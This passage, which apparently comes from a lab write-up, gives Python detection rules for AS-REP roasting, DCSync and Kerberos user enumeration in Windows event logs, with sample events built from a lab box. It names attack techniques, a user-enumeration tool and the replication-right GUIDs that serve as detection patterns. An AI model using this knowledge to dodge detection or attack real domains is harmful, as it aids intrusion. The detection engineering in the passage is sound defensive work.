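    if ev["EventID"] != 4662:
        return False
    who = ev["SubjectUserName"]
    if who.endswith("$") or who.lower() in replication_accounts:
        return False
    props = ev["Properties"].lower()
    return any(guid in props for guid in REPLICATION_GUIDS)


def enumeration_sources(events, threshold=5):
    """Client addresses with at least `threshold` 4768 failures for unknown
    principals: the footprint of a run like kerberos_enumusers."""
    counts = Counter(ev["IpAddress"] for ev in events
                     if ev["EventID"] == 4768
                     and ev["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def detect(events, replication_accounts=frozenset()):
    """(rule, account) pairs from the per-event rules."""
    alerts = []
    for ev in events:
        if is_asrep_roast(ev):
            alerts.append(("AS-REP roasting", ev["TargetUserName"]))
        elif is_dcsync(ev, replication_accounts):
            alerts.append(("DCSync", ev["SubjectUserName"]))
    return alerts


# Helpers that build the constructed events in the shape of the native ones.
def tgt_request(user, status, preauth, etype, ip):
    return {"EventID": 4768, "TargetUserName": user, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype, "IpAddress": ip}


def object_access(user, properties):
    return {"EventID": 4662, "SubjectUserName": user, "Properties": properties}


REPL_PROPS = ("Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
OTHER_PROPS = "Read Property {00000000-0000-0000-0000-000000000000}"  # placeholder GUID

# Constructed sample: five unknown users from one client (failed 4768s carry
# PreAuthType "-" and etype 0xffffffff), one roastable TGT, one normal AES logon,
# a DCSync by a user account, and legitimate replication by the DC's own account.
SAMPLE_EVENTS = (
    [tgt_request(f"user{i}", "0x6", "-", "0xffffffff", "10.10.14.5") for i in range(5)]
    + [tgt_request("fsmith", "0x0", 0, "0x17", "10.10.14.5"),
       tgt_request("hsmith", "0x0", 2, "0x12", "10.10.10.20"),
       object_access("svc_loanmgr", REPL_PROPS),
       object_access("SAUNA$", REPL_PROPS),
       object_access("fsmith", OTHER_PROPS)]
)

if __name__ == "__main__":
    print("alerts:", detect(SAMPLE_EVENTS))
    print("enumeration sources:", enumeration_sources(SAMPLE_EVENTS))
```

The DCSync rule is the one that needs tuning in a real environment: anything that legitimately replicates (a second DC, Azure AD Connect) must be allow-listed through replication_accounts, and the fact that svc_loanmgr could replicate at all is the underlying finding on this box, since a service account should never hold those rights.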